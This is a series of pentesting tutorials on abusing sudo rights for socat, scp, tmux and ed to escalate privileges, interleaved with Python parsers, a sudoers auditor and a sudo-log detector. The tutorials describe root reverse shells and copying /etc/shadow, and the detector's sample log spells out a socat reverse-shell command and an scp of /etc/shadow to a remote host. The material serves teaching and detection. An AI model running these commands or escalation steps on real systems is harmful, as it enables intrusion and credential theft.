Linux For Pentester: socat Privilege Escalation

Welcome back to another command from the "Linux for pentester" series. As we know, there are many tools that help a user transfer data. Here we take advantage of one more of them, "socat", a utility for data transfer between two addresses, and put it to use in our mission of privilege escalation.

NOTE: “The main objective of publishing the series of “Linux for pentester” is to introduce the circumstances and any kind of hurdles that can be faced by any pentester while solving CTF challenges or OSCP labs which are based on Linux privilege escalations. Here we do not criticize any kind of misconfiguration that a network or system administrator does for providing higher permissions on any programs/binaries/files & etc.” 

Table of Contents

Overview of socat

  • What is socat
  • Basic parameters of socat
  • The operations achieved by socat

Abusing socat

  • Sudo lab setup for privilege escalation
  • Exploiting sudo

What is socat

socat is a network utility similar to netcat which supports IPv6 and SSL and is available for both Windows and Linux. The first thing you will notice about this tool is that its syntax differs from netcat and the other standard Unix tools you are used to.

In other words, it is a command-line utility that establishes two bidirectional byte streams and transfers data between them; the streams can be built from a large set of different data sinks and address types.

It is a utility for data transfer between two addresses and uses the syntax "socat [options] <address> <address>".

We will start working with this very flexible tool by looking at its help output.

Basic parameters of socat

The most basic socat invocation is socat [options] <address> <address>; a more realistic example is socat -d -d - TCP4:www.example.com:80.

Here "-d -d" are the options, "-" is the first address and TCP4:www.example.com:80 is the second address.

The syntax is easier to understand if we break each component down a bit. Let's start with the address, since the address is the key element of socat.

Addresses:

Since socat always works with two addresses, it is important to understand what an address actually is and how it works. The address is what the user provides on the command line. Invoking socat without any addresses produces the message shown below:

~: socat

2018/09/22 19:12:30 socat[15505] E exactly 2 addresses required (there are 0); use option “-h” for help

Type:

After the address, the next component of socat is the "type", which specifies the kind of address we need. Some popular choices are TCP4, CREATE, EXEC, STDIN, STDOUT, PIPE and UDP4; the names are largely self-explanatory.

Some address types also have aliases: "-" is an alias for STDIO, and TCP stands for TCP4. The man page lists all the other aliases.

Parameters:

Immediately after the type come zero or more required address parameters, separated by colons (":").

The number of address parameters depends on the address type. The address type TCP4, for example, requires a server (host) description and a port description.
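To make the syntax described above concrete, here is a small Python parser written for this page (it is not part of the original article or of socat itself) that models a socat command line: flag-style options first, then exactly two addresses, each made of a type, its colon-separated parameters and optional comma-separated address options, with the aliases "-" → STDIO and TCP → TCP4. The required-parameter counts are taken from socat(1) for the types named on this page; the handling of options that take a value (such as -T) and of quoting inside parameters is deliberately omitted and labelled as an assumption in the code.

```python
import re

# Aliases named on this page plus the IPv4 ones from socat(1); others exist.
ALIASES = {"-": "STDIO", "TCP": "TCP4", "UDP": "UDP4",
           "TCP-LISTEN": "TCP4-LISTEN", "UDP-LISTEN": "UDP4-LISTEN"}

# Required colon-separated parameters per type, per socat(1): TCP4/UDP4 need
# a host and a port, the *-LISTEN forms a port, EXEC a command, OPEN/CREATE a file.
REQUIRED = {"STDIO": 0, "STDIN": 0, "STDOUT": 0, "PIPE": 0,
            "TCP4": 2, "UDP4": 2, "TCP4-LISTEN": 1, "UDP4-LISTEN": 1,
            "EXEC": 1, "OPEN": 1, "CREATE": 1}


def parse_address(spec):
    """Split one socat address into type, parameters and address options.

    Layout: TYPE[:param[:param...]][,option[,option...]]
    Assumption: no quoting/escaping of ':' or ',' inside a parameter is handled.
    """
    head, *options = spec.split(",")        # options follow the first comma
    type_, *params = head.split(":")        # parameters are colon-separated
    type_ = ALIASES.get(type_, type_.upper())   # '-' is an alias, types are case-insensitive
    type_ = ALIASES.get(type_, type_)           # e.g. TCP -> TCP4
    if type_ not in REQUIRED:
        raise ValueError(f"unknown address type {type_!r}")
    if len(params) < REQUIRED[type_]:
        raise ValueError(f"{type_} needs {REQUIRED[type_]} parameter(s), got {len(params)}")
    return {"type": type_, "params": params, "options": options}


def parse_command(argv):
    """Model 'socat [options] <address> <address>'.

    Assumption: only flag-style options (e.g. -d -d) are recognised; options
    that take a value, such as -T <timeout>, are not modelled.
    """
    options, addresses = [], []
    for tok in argv:
        if tok.startswith("-") and len(tok) > 1 and not addresses:
            options.append(tok)
        else:
            addresses.append(tok)           # a lone '-' is the STDIO address
    if len(addresses) != 2:
        # Same condition socat itself reports when it is given too few addresses.
        raise ValueError(f"exactly 2 addresses required (there are {len(addresses)}); "
                         "use option \"-h\" for help")
    return {"options": options, "addresses": [parse_address(a) for a in addresses]}


if __name__ == "__main__":
    import json
    print(json.dumps(parse_command(["-d", "-d", "-", "TCP4:www.example.com:80"]), indent=2))
```

Feeding it the example from the text shows the two options, the STDIO address resolved from "-" and the TCP4 address with its host and port parameters; an address such as OPEN:raj,creat,append (used later on this page) comes back with "creat" and "append" as address options.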

The operations achieved by socat

Sending and receiving text messages bidirectionally: As we know, socat is a command-line utility that establishes two bidirectional byte streams and transfers data between them. I will now establish a connection between two machines and transfer messages between them.

For this we need to start a listener on one machine. In the image below this is done on "kali", which acts as the listener and is ready to accept whatever "ubuntu" sends, using the command shown:

After starting the listener, the next step is to run socat on the other machine, "ubuntu". Here we specify the IP and port of the machine on which the listener is running.

We have now succeeded in sharing text between both terminals, as shown in the image below.

EXEC address used with socat to obtain a shell: socat also allows the user to obtain a shell on another machine. In this tutorial I want to get a shell of "ubuntu" on the "kali" terminal using the "EXEC" type.

With the command above we have established a connection between the two machines. After running the listener on "ubuntu", we run socat on "kali", specifying the IP and port of the machine (ubuntu), which gives us the shell of ubuntu on kali as requested.

To check whether you have a shell on the desired machine, simply run "id". As the image below shows, it reports user "raj", which is a user on "ubuntu", so the shell was obtained successfully.

EXEC address used with socat to transfer a file: Now we use another function of "EXEC" to transfer a file. Here I want to transfer the "passwd" file from "ubuntu" to "kali", again following the same process.

When we switch to kali and run socat, it shows us the "passwd" file of the source machine.

Working with socat using another type: As we know, socat supports a list of "types" such as CREATE, EXEC, STDIN, STDOUT, PIPE and so on.

In the image below I have a text file named "test", and I want the listener machine to execute this file.

In the command above I first read the "test" file and then pipe its output into socat as its input.

As the image below shows, I used the "OPEN" type, requesting that a file named "raj" be created and that the content of "test" be appended to this newly created file "raj".

So when I run the listener on "ubuntu" it executes the "raj" file, showing the content of the "test" file as intended.

Abusing socat

Sudo Rights Lab setups for Privilege Escalation

Now we start our mission of privilege escalation. As with the other commands in the "Linux for pentester" series, we first need to set up a lab in which the "socat" command has administrative rights.

This can be seen in the image below, in which I have granted sudo permission to a local user (test), who can now run the "socat" command as the root user.

To add the sudo right, open the /etc/sudoers file and add the following line under the user privilege specification.

Exploiting Sudo rights

First Method:

Now we start exploiting socat by taking advantage of the sudoers permission. For this we first need a session on the victim's machine; only then can we carry out the task.

So we connect to the target machine over ssh with the following command, logging in as the local user.

Since the "test" user has sudo privileges, we try to obtain a root shell on the host with socat's EXEC type. We check the sudo rights of the "test" user (if any) and find that "test" can execute the socat command as "root" without a password.

In a new terminal, launch socat as a listener and supply the listener's IP and port to the socat command on the host to obtain a reverse shell from it.

We now have a shell on the victim's machine with root privileges, as shown in the screenshot below.

Second Method:

There is a second way to obtain a higher-privileged shell: a socat one-liner reverse shell command.

In a new terminal, start socat as a listener and obtain a root shell of the remote machine.

Conclusion: In this way we can make use of the "socat" command to escalate privileges on the remote machine.

Author: Komal Singh is a Cyber Security Researcher and Technical Content Writer; she is a thoroughly enthusiastic pentester and Security Analyst at Ignite Technologies.

Linux for Pentester: scp Privilege Escalation

In this article we introduce another very useful Linux command, "scp", short for "secure copy". The scp command allows files to be transferred securely between the local host and a remote host, or between two remote hosts. With that in mind, we will see how this utility can be taken advantage of for privilege escalation.


Table of Contents

Introduction to scp

Major operations performed using scp

  • Copy a file from the local system to the remote machine
  • Copy a file from a remote system to the local machine
  • Provide modification time and date
  • To display detailed information of the SCP process
  • Copying file inside directory recursively
  • To specify a specific port

Exploiting scp

  • Abusing Sudo right

Introduction to scp

scp is a built-in command on Linux used to copy files between servers in a secure way; in other words, it is a command-line utility that lets you securely copy files and directories between two locations. It uses the same authentication and security as the Secure Shell (SSH) protocol, and is known for its simplicity, security and out-of-the-box availability.

Major operations performed using scp

In this tutorial we show how to use the scp command, with explanations of its most common options. We start with its help output, shown in the image below.

After checking the help output, we go through its major operations one by one.

Copy a file from the local system to a remote machine: scp lets the user securely copy a file or directory from the local system to a remote host, or vice versa. Using this, we now copy a file named "scan.xml" that is stored on my local system, with the command below:

In the above command "scan.xml" is the file I want to copy, "aarti" is the remote user name, "192.168.1.31" is the remote machine's IP and "/home/aarti/Desktop" is the path on the remote machine where I want the file placed.

Once the command is issued, it prompts for the user's password and the transfer starts.

Note: Omitting the filename from the destination copies the file under its original name. If you want to save it under a different name, specify the new name as well.

Following the above syntax, the file has been copied to the destination on the remote system, as shown below.

Copy a file from the remote system to the local machine: Similarly, we can copy a file or directory from the remote machine to the local system with the command below.

Running the command, we are again prompted for the user's password, after which the transfer starts.

The file has now been copied from the remote system to the destination on the local system.

Provide modification time and date: You may have noticed that, by default, the copied file's time and date are set to the current time and date.

In the image below, the "demo.txt" file shows the current date and time from when it was copied.

The next image shows the original date and time, i.e. when the file was created.

To give the copied file its original details, use the "-p" option. With this argument the file is copied with its original date and time instead of the current ones.

To display detailed information about the SCP process: In all the screenshots above, after entering the password there is no information about the SCP process; the prompt simply returns once it has completed. If you want detailed information about the process, use the "-v" parameter.

Copying the files inside a directory recursively: Sometimes we need to copy a directory and all the files and directories inside it, preferably in one command. scp supports this with the "-r" parameter.

In the image below I have copied "fluxion" recursively.

Note: The time taken to copy depends on the amount of data, but the "-C" option enables compression, which can make the copy faster.

In the image below, fluxion has been copied successfully.

To specify a port: scp uses port 22 as its default port. If, for security reasons, the service has been moved to another port, use the "-P" argument to specify it.

For example, to use port 2222 the command needs to be

Lab setups for Sudo Privilege Escalation

Set User ID is a type of permission that allows users to execute a file with the permissions of a specified user. We now perform privilege escalation for "scp"; for this we set up a lab in which the scp command has administrative rights.

We give sudo permission on scp so that a local user can run scp as the root user.

Hence, type the following to grant that right:

This can be seen in the image below, in which I have created a local user (test) and added a sudo right for the scp program in the /etc/sudoers file under the user privilege specification.

First Method

Then we check the sudo rights of the "test" user (if any) and find that "test" can execute the scp command as "root" without a password.

Running the command below drops us into a root shell, as shown, and our task is accomplished.

Second Method

To proceed with the second method, we first need to check the status of the ssh service, which must be running during the entire process (on Kali Linux).

Now I copy the passwd and shadow files of the host machine (Ubuntu) with the scp command, as shown in the image below.

The command prompts for the user's password, after which the transfer starts.

Once that is done, you can check whether the files were copied successfully with the command below.

Conclusion: We have achieved our mission and successfully copied the passwd and shadow files using the scp command.

Reference: https://gtfobins.github.io/


Linux For Pentester: tmux Privilege Escalation

In this article we describe "tmux", also known as a terminal multiplexer. It allows multiple terminal sessions to be accessed concurrently in a single window, which is useful for running more than one command-line program at the same time.


Table of Contents

  • What is tmux
  • How to use tmux
  • tmux framework
  • tmux commands
  • Assigning Sudo rights
  • Exploiting Sudo rights

What is tmux?: tmux is a terminal multiplexer: it runs a server process on your host (a Linode, in the original description) and connects to it with a client window. If the client is disconnected the server keeps running, and when you reconnect after rebooting your computer you can reattach to the tmux session, with the files you were working on still open.

In other words, it is a tool that lets us open multiple windows and split views (called "panes" in tmux terminology) within one terminal window.

How to use tmux: Like other tools, tmux supports many commands for performing its functions. We describe each of its major operations one by one.

Commands are issued by pressing a key combination called the prefix and then typing a letter; many letters are bound to tmux actions.

tmux framework: All the operations tmux performs can be understood from its hierarchical structure, shown below.

tmux commands: There is a list of commands that help while working with tmux. In this article we go through the major operations that can be performed with tmux.

First, its help output: for this we type "tmux --help" on the kali terminal, as shown below.

tmux operations fall into three categories, described above in its framework. We start with the first, "sessions".

Operating tmux sessions: Sometimes even multiple windows and panes are not enough and you need to separate layouts logically by grouping them into separate sessions.

Sessions are useful for completely separating work environments.

There are many session operations in tmux, shown in the image below; I describe a few of them.

  • Create a new session: To create a new session we use the command shown in the image below.

In the above command "-s" is the argument for a new session and "Ignite" is the name of the session I want to create.

tmux then creates a new session named Ignite, highlighted at the bottom of the terminal. In the same way one can create multiple sessions with different names as needed.

  • List all created sessions: once the desired sessions have been created, we can check them with the command:

This lists all the sessions that have been created. In the image below tmux lists all the sessions I created by following the procedure above.

Operating tmux windows: When a tmux session starts, a single window is created by default, but tmux also lets us attach multiple windows to the same session and switch between them as needed. This is helpful when you want to run several jobs in parallel.

Apart from creating multiple windows, it supports operations such as renaming a window, switching between windows and many others.

Initially the status line shows "0: bash*" by default: 0 is the window's index, bash is the window name (which can be renamed as needed) and * marks the current window. When we create new windows, tmux lists all of them at the bottom of the terminal.

Note: tmux operations are performed by combining the prefix with a letter as required. See the table below to understand this clearly.

In this article I have created 5 windows, as shown in the image below.

  • Create a new window: To create a new window, press the prefix (ctrl-b) followed by "c".

This creates a new window. Use the same procedure to create multiple windows, as in the image below.

  • Rename a window: by default tmux names a window "bash", but we can change that as we wish. Here I rename my last window as shown below.

  • Switch windows: we can also switch between multiple windows, which makes working in parallel possible. This can be done in several ways.

  • Display a summary: To see a summary of everything done so far, we use the tmux option:

Operating tmux panes: With tmux we can divide each window into multiple panes. This is useful when you want the output of multiple processes visible within a single window.

Here we have many options, such as splitting a window vertically or horizontally, rotating panes and switching to a different pane. We check each of these one by one.

Note: use the table below for reference.

Here I have split my window into 2 panes vertically with the command:

In the image below I have further split my window horizontally.

Suppose we have multiple panes each containing some information and we want to rotate them. Then we follow the step:

With the above command tmux simply moves the current pane to the left.

Assigning Sudo Rights

A sudo right is a permission that allows users to execute a file with superuser permissions. We now perform privilege escalation for "tmux". For this we set up a lab in which the tmux command has administrative rights and then check what effect the "tmux command" has once it has sudo rights.

We give sudo permission on tmux so that a local user can run tmux as the root user.

Hence, type the following to grant the sudo right:

This can be seen in the image below, in which I have created a local user (test). To add the sudo right, open the /etc/sudoers file and add the following line under the user privilege specification.

Exploiting Sudo rights

Now we exploit tmux by taking advantage of the sudoers permission. For this we need a session on the victim's machine that gives us local user access to the targeted system, from which we can escalate to root.

First we connect to the target machine over ssh with the following command, logging in as the local user.

Then we check the sudo rights of the "test" user (if any) and find that "test" can execute the tmux command as "root" without a password.

Knowing that the test user has sudo rights, we take advantage of this and use the tmux command to escalate the privileges of the test user.

Conclusion: This launches a new terminal with a root-privileged shell.


Linux for Pentester: ed Privilege Escalation

In this article we introduce a line-oriented text editor command, "ed", which is used to create, display, alter and manipulate text files. All ed commands operate on whole lines or ranges of lines: for example, the "d" command deletes lines, the "m" command moves lines and the "t" command copies lines. We will then see how all these features of "ed" can be used to accomplish our task of privilege escalation.

Table of Contents

Overview of ed

  • Summary of ed
  • Primary actions attained using ed

Abusing ed

  • Sudo lab setup for privilege escalation
  • Exploiting sudo

Summary of ed

The ed command on Linux starts the "ed text editor", a line-based editor. Its minimal interface makes working on text files less complex. It helps the user perform many operations, such as creating, editing, displaying and manipulating files.

Editing is done in two distinct modes: "command" and "input". In "command" mode ed reads commands from standard input and executes them to manipulate the contents of the editor buffer, whereas when an input command such as 'm' (move), 'd' (delete), 't' (copy) or 'c' (change) is given, ed enters its "input" mode.

It is the oldest editor, developed in 1969 on UNIX, and was succeeded by the vi and emacs text editors.

Now type its help command to learn more about "ed".

Fundamental activities achieved by "ed": As we know, "ed" performs many operations, so we now go through its functionality one by one.

Initializing a file with ed: At the start, the terminal looks like the image below when the command is run. By default the editor creates an empty buffer to write into, just as any other command-line editor does when invoked without a file name.

Now we create a text file containing some text. For this we first press 'a' before entering anything into the file, and once we have finished writing we enter a period (.) to signal this to the editor.

Note: The main thing to remember is that 'a' (at the start) and '.' (at the end) are the ways to enter and leave insert mode. Then, to save the buffer to a file, use 'w' followed by a file name of your choice; this saves the file under that name and also displays the total number of bytes the file contains. Finally, 'q' quits the editor.

To confirm that your file was created, you can check it with the "cat" command.

Editing the file with ed: If you need to edit the same file again, simply pass the file name as an argument to the ed command and follow the same procedure as above.

In the image below I add one more line to my file "info.txt", created above, following the same process.

Note: Every time we use any ed operation we need the 'a', '.', 'w' and 'q' commands.

Changing a specific line: So far we have covered basic editing with ed; now let's look at more editing aspects, for example how to make changes to a specific line.

The image below shows how to print a particular line using the 'p' and 'n' commands.

Typing 'p' prints the current line, i.e. the one the cursor is at, while 'n' prints it along with its line number.

After typing 'n' we simply enter the number of the line we want to alter. By default 'n' displays the last line of the file, so after that you can type the number of the line you are looking for.

Once you have reached the line you want to change, enter 'c' to replace that line by typing its text again. For example, I changed the 5th line, the last line of my file, by adding some more detail to it. To check my modification I read the file with the 'cat' command; the file is saved by following the same process as before.

Displaying an error message with ed: When you type something ed cannot understand, it displays a question mark (?) by default. To find out what went wrong, ed provides a very helpful option, 'h'.

The screenshot below shows that when I used the 'b' option it gave me (?), the error symbol, and on typing 'h' ed displayed the error message "unknown command" for option 'b'.

Copy and move operations with ed: Besides the functions discussed above, ed can also copy a line to another location and paste it there; for this we use the 't' command to copy a line and 'm' to move one. Precede 't' with the number of the line you want to copy and follow it with the destination line number. For example, as in the image below, I copied the 5th line to position 0 and saved the change.

In the above command 5 is the line to be copied and 0 is the line number after which it is to be placed.

Note: One can also use 'm' instead of 't' to move the line to another place.

Search operations with ed: Searching for a line by keyword is easy with ed. For this we first run ed with "-p%", which makes it prompt for further input. Then, to search forward, enter '/' followed by the search keyword. When you press enter, the editor displays the first line it encounters that contains the keyword; run the command again to continue searching.

In the image below ed has printed only those lines that contain the search keywords, i.e. misconfiguration and Linux.
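The ed session described above (append with 'a' and '.', write with 'w', select a line with 'n' or a bare line number, replace it with 'c', copy with 't', move with 'm', search with '/', and 'h' after a '?'), as an added example that is not part of the original article: a small Python model of those ed commands. It is an illustration written for this page, not GNU ed; it only understands single line-number addresses, which is all the procedure above uses.

```python
import re

# One command line: optional line number, optional command letter, optional argument.
CMD_RE = re.compile(r"^(\d*)([a-z]?)\s*(.*)$")


class MiniEd:
    """Model of ed's line-oriented behaviour for a, ., w, q, p, n, c, t, m, h and /pattern/."""

    def __init__(self, lines=()):
        self.buf = list(lines)
        self.cur = len(self.buf)      # like ed, the current line starts at the last line
        self.mode = "command"
        self.output = []              # what ed would print to the terminal
        self.saved = {}               # filename -> contents written by 'w'
        self.last_error = ""
        self.quit = False

    def feed(self, text):
        """Drive the editor with terminal input, one line at a time."""
        for line in text.splitlines():
            if self.quit:
                break
            self._input(line) if self.mode == "input" else self._command(line)
        return self

    def _input(self, line):
        if line == ".":               # a lone '.' ends input mode
            self.mode = "command"
            return
        self.buf.insert(self.cur, line)   # new text goes after the current line
        self.cur += 1

    def _error(self, msg):
        self.last_error = msg
        self.output.append("?")       # ed prints only '?'; 'h' explains it

    def _valid(self, n):
        return 1 <= n <= len(self.buf)

    def _command(self, line):
        if line.startswith("/"):
            return self._search(line.strip("/"))
        addr, cmd, arg = CMD_RE.match(line).groups()
        n = int(addr) if addr else self.cur
        if cmd == "":                 # bare address (or empty line): go there and print
            cmd, n = "p", (n if addr else self.cur + 1)
        if cmd in ("p", "n"):
            if not self._valid(n):
                return self._error("Invalid address")
            self.cur = n
            self.output.append(f"{n}\t{self.buf[n - 1]}" if cmd == "n" else self.buf[n - 1])
        elif cmd == "a":              # append after line n (0 = before the first line)
            self.cur, self.mode = n, "input"
        elif cmd == "c":              # replace line n with the text that follows
            if not self._valid(n):
                return self._error("Invalid address")
            del self.buf[n - 1]
            self.cur, self.mode = n - 1, "input"
        elif cmd in ("t", "m"):       # copy (t) or move (m) line n to after line arg
            dest = int(arg) if arg.isdigit() else self.cur
            if not self._valid(n) or not 0 <= dest <= len(self.buf):
                return self._error("Invalid address")
            text = self.buf[n - 1]
            if cmd == "m":
                del self.buf[n - 1]
                if dest >= n:
                    dest -= 1         # lines after the removed one shifted up
            self.buf.insert(dest, text)
            self.cur = dest + 1
        elif cmd == "w":              # write the buffer and report its size in bytes
            content = "".join(l + "\n" for l in self.buf)
            self.saved[arg or "(unnamed)"] = content
            self.output.append(str(len(content.encode())))
        elif cmd == "q":
            self.quit = True
        elif cmd == "h":              # explain the last '?'
            self.output.append(self.last_error)
        else:
            self._error("Unknown command")

    def _search(self, pattern):
        """Forward search starting after the current line, wrapping around."""
        total = len(self.buf)
        for k in range(total):
            i = (self.cur + k) % total + 1
            if re.search(pattern, self.buf[i - 1]):
                self.cur = i
                self.output.append(self.buf[i - 1])
                return
        self._error("No match")
```

Feeding it "a", two lines, ".", "w info.txt" and "q" reports 18 bytes for two nine-byte lines, exactly as the 'w' step above describes; "5t0" on a five-line buffer puts a copy of line 5 before line 1, and "b" followed by "h" yields "?" and then "Unknown command".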

Exploiting ed

Sudo Rights Lab setups for Privilege Escalation

We now perform privilege escalation for "ed". For this we set up a lab in which the ed command has administrative rights, and then check what effect the "ed command" has once it has sudo rights and how we can use it for privilege escalation.

This can be seen in the image below, in which I have created a local user (test) who is given sudo rights to run ed as root.

To add the sudo right, open the /etc/sudoers file and add the following line under the user privilege specification.
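Each lab setup on this page (socat, scp, tmux and now ed) adds a user privilege specification to /etc/sudoers that lets a local user run one of these binaries as root without a password. As an added example that is not part of the original articles, here is a Python audit that parses sudoers lines and flags exactly that kind of entry, so an administrator can find such grants before an attacker does. The sudoers sample is constructed for the example; the list of risky binaries is just the four covered on this page, and the parser handles only the plain "user host=(runas) TAG: command" form (aliases and include directives are skipped, an assumption noted in the code).

```python
import os
import re

# The four binaries this page shows being used for a root shell or root-level file access.
RISKY = {"socat", "scp", "tmux", "ed"}
# Lines that are not user privilege specifications (assumption: aliases are not expanded).
SKIP = ("#", "@", "Defaults", "User_Alias", "Host_Alias", "Cmnd_Alias", "Runas_Alias")

# user host=(runas_user[:runas_group]) [TAG: ...] command[, command ...]
ENTRY_RE = re.compile(r"^(?P<user>\S+)\s+(?P<host>\S+)\s*=\s*(?:\((?P<runas>[^)]*)\)\s*)?(?P<cmds>.+)$")
TAG_RE = re.compile(r"^(NOPASSWD|PASSWD|SETENV|NOSETENV|NOEXEC|EXEC):\s*")


def _split_tags(spec):
    """Peel 'TAG:' prefixes (e.g. 'NOPASSWD: /usr/bin/socat') off a command spec."""
    tags = []
    while (m := TAG_RE.match(spec)):
        tags.append(m.group(1))
        spec = spec[m.end():]
    return tags, spec.strip()


def audit_sudoers(text):
    findings = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(SKIP):
            continue
        m = ENTRY_RE.match(line)
        if not m or m["user"] == "root":
            continue
        runas_user = (m["runas"] or "root").split(":")[0].strip() or "root"
        root_capable = runas_user in ("root", "ALL")
        nopasswd = False                      # a tag stays in effect for the commands after it
        for spec in m["cmds"].split(","):
            tags, spec = _split_tags(spec.strip())
            if "NOPASSWD" in tags:
                nopasswd = True
            if "PASSWD" in tags:
                nopasswd = False
            binary = os.path.basename(spec.split()[0]) if spec else ""
            if spec == "ALL":
                findings.append({"user": m["user"], "command": "ALL", "severity": "info",
                                 "nopasswd": nopasswd,
                                 "reason": "unrestricted sudo; expected only for administrators"})
            elif binary in RISKY:
                findings.append({"user": m["user"], "command": spec,
                                 "severity": "high" if root_capable else "medium",
                                 "nopasswd": nopasswd,
                                 "reason": f"{binary} can spawn a shell or read/write arbitrary "
                                           f"files as {runas_user}; remove the entry or replace it "
                                           "with a wrapper that performs only the intended action"})
    return findings


# Constructed sample sudoers content mirroring the lab setups on this page.
SAMPLE_SUDOERS = """\
Defaults env_reset
root ALL=(ALL:ALL) ALL
%sudo ALL=(ALL:ALL) ALL
test ALL=(root) NOPASSWD: /usr/bin/socat
test ALL=(root) NOPASSWD: /usr/bin/scp, /usr/bin/tmux
deploy ALL=(root) NOPASSWD: /usr/bin/systemctl restart app
alice ALL=(www-data) NOPASSWD: /usr/bin/ed
"""

if __name__ == "__main__":
    for f in audit_sudoers(SAMPLE_SUDOERS):
        print(f"[{f['severity']}] {f['user']}: {f['command']} (NOPASSWD={f['nopasswd']}) - {f['reason']}")
```

On the sample the three root grants for socat, scp and tmux come out as high severity, the www-data grant for ed as medium, and the admin group's "ALL" as informational; the systemctl line is not flagged. On a real host, run it over the output of visudo -c -f or over /etc/sudoers and /etc/sudoers.d/* read as root.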

Exploiting Sudo rights

Now we exploit ed by taking advantage of the sudoers permission. For this we need a session on the victim's machine that gives us local user access to the targeted system, from which we can escalate to root.

First we connect to the target machine over ssh with the following command, logging in as the local user.

Then we check the sudo rights of the "test" user (if any) and find that "test" can execute the ed command as "root" without a password.

Knowing that the test user has sudo rights, we take advantage of this: the ed command, started with an empty buffer, can call a bash/sh shell, and it does so with higher privileges if sudo permits it.

Conclusion: We have successfully exploited "ed" by using its functionality after it was granted higher privileges.
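The exploitation steps on this page all leave the same trace: a sudo invocation of socat, scp, tmux or ed with USER=root in the authentication log. As an added example, not part of the original articles, here is a Python detector that runs over sudo's syslog records (constructed sample lines below, using documentation IP addresses) and flags those invocations, rating a socat EXEC/SYSTEM address, an scp of /etc/shadow and any root tmux or ed session as high, and other root runs of these binaries as medium. The record layout is sudo's standard "user : TTY=... ; PWD=... ; USER=... ; COMMAND=..." format; the regex and the severity rules are this example's own.

```python
import os
import re

# sudo's syslog record: 'sudo:     test : TTY=pts/0 ; PWD=/home/test ; USER=root ; COMMAND=...'
SUDO_RE = re.compile(
    r"sudo:\s+(?P<user>\S+)\s+:\s+TTY=(?P<tty>\S+)\s+;\s+PWD=(?P<pwd>\S+)\s+;"
    r"\s+USER=(?P<runas>\S+)\s+;\s+COMMAND=(?P<cmd>.+)$")

# The four binaries covered on this page; each can hand out a root shell or root file access.
WATCHED = {"socat", "scp", "tmux", "ed"}
SENSITIVE = ("/etc/shadow", "/etc/sudoers", "/root/")


def analyse(line):
    """Return a finding for a root sudo run of a watched binary, else None."""
    m = SUDO_RE.search(line)
    if not m:
        return None
    argv = m["cmd"].split()           # assumption: no quoted arguments with spaces
    binary = os.path.basename(argv[0])
    if binary not in WATCHED or m["runas"] != "root":
        return None
    reasons = []
    if binary == "socat" and any(a.upper().startswith(("EXEC:", "SYSTEM:")) for a in argv[1:]):
        reasons.append("socat EXEC/SYSTEM address executes a program as root")
    if binary == "scp" and any(s in a for a in argv[1:] for s in SENSITIVE):
        reasons.append("scp run as root touches a sensitive path")
    if binary in ("tmux", "ed"):
        reasons.append(f"{binary} run as root can open an interactive root shell")
    return {"user": m["user"], "tty": m["tty"], "binary": binary, "command": m["cmd"],
            "severity": "high" if reasons else "medium",
            "reasons": reasons or [f"{binary} run as root without an obvious shell argument"]}


def scan(lines):
    return [f for f in map(analyse, lines) if f]


# Constructed sample records (192.0.2.0/24 is a documentation range, not a real host).
SAMPLE_LOG = [
    "Sep 22 19:12:30 ubuntu sudo:     test : TTY=pts/0 ; PWD=/home/test ; USER=root ; "
    "COMMAND=/usr/bin/socat TCP4:192.0.2.10:1234 EXEC:/bin/sh",
    "Sep 22 19:13:02 ubuntu sudo:     test : TTY=pts/0 ; PWD=/home/test ; USER=root ; "
    "COMMAND=/usr/bin/scp /etc/shadow aarti@192.0.2.10:/tmp/",
    "Sep 22 19:14:11 ubuntu sudo:     test : TTY=pts/1 ; PWD=/home/test ; USER=root ; "
    "COMMAND=/usr/bin/tmux",
    "Sep 22 19:15:40 ubuntu sudo:     deploy : TTY=pts/2 ; PWD=/srv ; USER=root ; "
    "COMMAND=/usr/bin/apt update",
    "Sep 22 19:16:05 ubuntu sudo:     test : TTY=pts/0 ; PWD=/home/test ; USER=root ; "
    "COMMAND=/usr/bin/socat - TCP4:192.0.2.10:80",
    "Sep 22 19:17:00 ubuntu sudo:     alice : TTY=pts/3 ; PWD=/home/alice ; USER=www-data ; "
    "COMMAND=/usr/bin/ed /var/www/index.html",
]

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f"[{f['severity']}] {f['user']} on {f['tty']}: {f['command']} -> {'; '.join(f['reasons'])}")
```

On the sample this yields four findings (three high, one medium); the apt line and the www-data ed line are ignored. On Ubuntu these records live in /var/log/auth.log; the same logic applies to journalctl output for the sudo unit once the prefix before "sudo:" is stripped.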
